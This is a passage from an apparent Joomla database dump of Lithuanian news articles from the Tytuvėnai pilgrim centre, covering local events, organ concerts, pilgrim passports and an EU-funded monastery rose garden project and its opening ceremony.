-webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><img src=\"images/stories/naujienos/sveciai_is_jav/pic.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>',1,0,0,44,'2018-04-24 05:03:03',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2018-04-24 05:03:03','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/sveciai_is_jav\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,71,'','',1,2260,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(315,404,'Vasaros sezono atidarymas','vasaros-sezono-atidarymas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame š. m. birželio 1 d. Kelmės rajono gyventojus ir svečius pasitikti ir atidaryti vasaros sezoną. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><img src=\"images/stories/naujienos/vasaros_atidarymas/vasaros sezonas_skelbimas_4-page-001.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>',1,0,0,44,'2018-05-24 15:41:15',135,'','2018-05-24 15:41:20',135,0,'0000-00-00 00:00:00','2018-05-24 15:41:15','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vasaros_atidarymas\\/vasara_tytuvenai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,70,'','',1,2329,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(324,413,'Apsilankykite Tytuvėnų ansamblyje','kvieciame-visus-i-vakariene-baltas-vakaras-3','','<p>Apsilankykite Tytuvėnų ansamblyje Šiluvos atlaidų metu!</p>\r\n','\r\n<p style=\"text-align: justify;\"><strong style=\"font-size: 12.16px;\"><img src=\"images/DJI_0138.JPG\" border=\"0\" alt=\"\" /></strong></p>\r\n<p><img src=\"images/2 sil.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-09-05 08:34:10',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/DJI_0138.JPG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,64,'','',1,1975,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(325,414,'Piligrimų pasas','kvieciame-visus-i-vakariene-baltas-vakaras-4','','<p>Kviečiame apsilankyti Tytuvėnų vienuolyne. Visiems norintiems ir aktyviai besilankantiems sakralinio paveldo objektuose nemokamai įteiksime piligrimų pasus.  </p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/piligrimu pasas.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-09-12 09:34:15',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/piligrimu pasas 4.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,63,'','',1,2196,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(326,415,'Vargonų koncertai','kvieciame-visus-i-vakariene-baltas-vakaras-5','','<p>Kviečiame apsilankyti Tytuvėnų bažnyčioje vykstančiuose vargonų koncertuose!</p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/vargonu koncertai.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-09-12 10:54:00',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/vargonu koncertai 3.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,62,'','',1,2254,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(329,418,'Rožių sodas','kvieciame-visus-i-vakariene-baltas-vakaras-8','','<p>Kviečiame susipažinti su projektu<strong> </strong>\"Tytuvėnų bažnyčios ir vienuolyno ansamblio rožių sodo įrengimas\"</p>\r\n','\r\n<p><img src=\"images/logas be fono 1.png\" border=\"0\" alt=\"\" />   <img src=\"images/Lietuvos LEADER logotipas 1.jpg\" border=\"0\" alt=\"\" />   <img src=\"images/New Picture 1.png\" border=\"0\" alt=\"\" />   <img src=\"images/KPF.jpg\" border=\"0\" alt=\"\" /><br /><br />Tytuvėnų piligrimų centras įgyvendina projektą ,,Tytuvėnų bažnyčios ir vienuolyno ansamblio rožių sodo įrengimas‘‘. Nacionalinė mokėjimo agentūra prie Žemės ūkio ministerijos skyrė paramą pagal Kelmės krašto vietos veiklos grupės 2016-2023 metų vietos plėtros strategijos priemonės ,,Kaimo tradicijų puoselėjimas, mokomųjų, švietėjiškų veiklų rėmimas‘‘ veiklos sritį ,,Laisvalaikio ir turizmo veiklų skatinimas saugomose teritorijose‘‘ projekto ,,Tytuvėnų bažnyčios ir vienuolyno ansamblio rožių sodo įrengimas‘‘ įgyvendinimui iš Europos žemės ūkio fondo kaimo plėtros fondo. Skirtos ES lėšos 12 432,95 EUR, Lietuvos valstybės biudžeto lėšos 2 194,05 EUR, pareiškėjo bei partnerio Kelmės rajono savivaldybės lėšos sudaro 7 496,34 EUR.</p>\r\n<p>Vietos projekto tikslas: įrengti rožių sodą su bažnytine simbolika. Šiuo metu atlikti žemės kasimo, žolės išvežimo, grunto augalams atvežimo darbai, įrengti takeliai. 2019 metų gegužės mėnesį numatoma pasodinti virš 2000 vnt. rožių sodinukų.<br />Po dalies darbų atlikimo:</p>\r\n<p> <img src=\"images/gdhrfbhdf.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p> </p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-12-13 13:27:32',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/KPF_logo_ sumazintas.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,0,59,'','',1,2344,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(330,419,'Rožių sodo įrengimo projektas','ii-etapas-baznycios-restauravimas-2','','<p style=\"text-align: center;\"> </p>\r\n<p style=\"text-align: justify;\"><br /><img src=\"images/logas be fono 1.png\" border=\"0\" alt=\"\" />   <img src=\"images/Lietuvos LEADER logotipas 1.jpg\" border=\"0\" alt=\"\" />  <img src=\"images/KPF.jpg\" border=\"0\" alt=\"\" /><br /><br />Tytuvėnų piligrimų centras įgyvendina projektą ,,Tytuvėnų bažnyčios ir vienuolyno ansamblio rožių sodo įrengimas‘‘. Nacionalinė mokėjimo agentūra prie Žemės ūkio ministerijos skyrė paramą pagal Kelmės krašto vietos veiklos grupės 2016-2023 metų vietos plėtros strategijos priemonės ,,Kaimo tradicijų puoselėjimas, mokomųjų, švietėjiškų veiklų rėmimas‘‘ veiklos sritį ,,Laisvalaikio ir turizmo veiklų skatinimas saugomose teritorijose‘‘ projekto ,,Tytuvėnų bažnyčios ir vienuolyno ansamblio rožių sodo įrengimas‘‘ įgyvendinimui iš Europos žemės ūkio fondo kaimo plėtros fondo. Skirtos ES lėšos 12 432,95 EUR, Lietuvos valstybės biudžeto lėšos 2 194,05 EUR, pareiškėjo bei partnerio Kelmės rajono savivaldybės lėšos sudaro 7 496,34 EUR.</p>\r\n<p style=\"text-align: justify;\">Vietos projekto tikslas: įrengti rožių sodą su bažnytine simbolika. Šiuo metu atlikti žemės kasimo, žolės išvežimo, grunto augalams atvežimo darbai, įrengti takeliai. 2019 metų gegužės mėnesį numatoma pasodinti virš 2000 vnt. rožių sodinukų.</p>','',1,0,0,57,'2014-09-25 04:24:41',135,'','2018-12-13 13:33:55',135,0,'0000-00-00 00:00:00','2014-09-25 04:24:41','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,2,'','',1,3705,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(331,420,'Tapybos darbų paroda','kvieciame-visus-i-vakariene-baltas-vakaras-9','','<p>Kviečiame į tapybos darbų parodą!</p>\r\n','\r\n<p><br /><img src=\"images/Sigito Oranto Sausio paroda__INTERNETUI.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2019-03-27 11:35:53',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/Sigito Oranto Sausio paroda mazas.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,58,'','',1,2120,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(364,453,'Vienuolyno \"Rožių sodas\"','vienuolyno-roziu-sodas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vienuolyno „Rožių sodas“ – puiki vieta parodoms!<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">2021 m. birželio mėnesį Tytuvėnų vienuolyno rožių sode  atidaryta  kryžių paroda. Kryžiai - vieni seniausių žmonijos simbolių. Šie metaliniai, kalviški kryžiai surinkti iš vietinių apylinkių ir eksponuojami vienuolyno rožyne. Paroda sulaukė begalės lankytojų, ypač Tytuvėnų miesto šventės vykusios rugpjūčio 13-15 d. ,,Tytuvėnams 725‘‘ metu. Skaičiuojama, kad parodą aplankė per 1000 lankytojų. Todėl, kol nepakando rožių žiedų šalna, dar vis gera proga aplankyti vienuolyno rožyną ir pasidžiaugti ne tik žydinčiomis rožėmis, bet ir nuostabia kalviškų kryžių paroda.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><span>{gallery cols=2 width=320}stories/naujienos/rozynas{/gallery}</span></span></span></span></span></span></span></p>',1,0,0,44,'2021-09-23 19:05:11',135,'','2021-09-23 19:06:28',135,135,'2021-09-23 19:06:28','2021-09-23 19:05:11','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/rozynas\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,26,'','',1,1368,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(333,422,'Rožių sodo atidarymo šventė','roziu-sodo-atidarymo-svent','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame birželio 16 d. į rožių sodo atidarymo šventę!<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/sodas/rozeskelbimas.jpg\" border=\"0\" alt=\"\" width=\"1297\" height=\"534\" /></span></span></span></span></span></p>',1,0,0,44,'2019-06-03 20:39:00',135,'','2019-06-03 20:44:52',135,0,'0000-00-00 00:00:00','2019-06-03 20:39:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/sodas\\/roziu_sodas.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,56,'','',1,2340,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(334,423,'\"ROŽIŲ SODO\" atidarymo šventė','roziu-sodo-atidarymo-svente','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Birželio 16 d. įvyko ilgai lauktas VšĮ „Tytuvėnų piligrimų centro“ ir Tytuvėnų  parapijos organizuotas „Rožių sodo“ atidarymas. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span>{gallery cols=3 orientation=horizontal <span> width=600</span>}stories/naujienos/rozyno_atidarymas{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Renginys prasidėjo padėkos šv. Mišiomis už Geradarius. Vėliau renginys persikėlė prie pačio rožių sodo. Šventę vedė VšĮ „Tytuvėnų piligrimų centras“ l.e.p. direktorė Sandra Sabaliauskienė, visus linksmino „Šeduvos bernai“, vaišinosi įspūdingo dydžio tortu, gira. Renginio metu trumpai supažindinta su projektu, jo finansavimo šaltiniais. Buvusi VšĮ „Tytuvėnų piligrimų centro“ direktorė Asta Vaitkevičiūtė-Kizienė papasakojo apie pačio „Rožių sodo“ idėjos atsiradimą. Sulaukta ir nuoširdžių sveikinimų bei dovanų. Sveikinimo žodį tarė Tytuvėnų seniūnijos seniūnas Romas Čerkauskas, Tytuvėnų gimnazijos direktorė Irma Stankuvienė, Tytuvėnų bendruomenės pirmininkė Regina Karašauskytė, sveikinimus perdavė ir Kelmės r. savivaldybės Tarybos narys Mindaugas Čerkauskas, UAB „Grunkasta“ direktorius Giedrius Sutkus ir Nemira Sutkienė. Tytuvėnų parapijos klebonas Rimantas Žaromskis pašventino „Rožių sodą“, simbolinę atidarymo juostą kirpo l.e.p. direktorė Sandra Sabaliauskienė, klebonas Rimantas Žaromskis ir seniūnas Romas Čerkauskas.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: 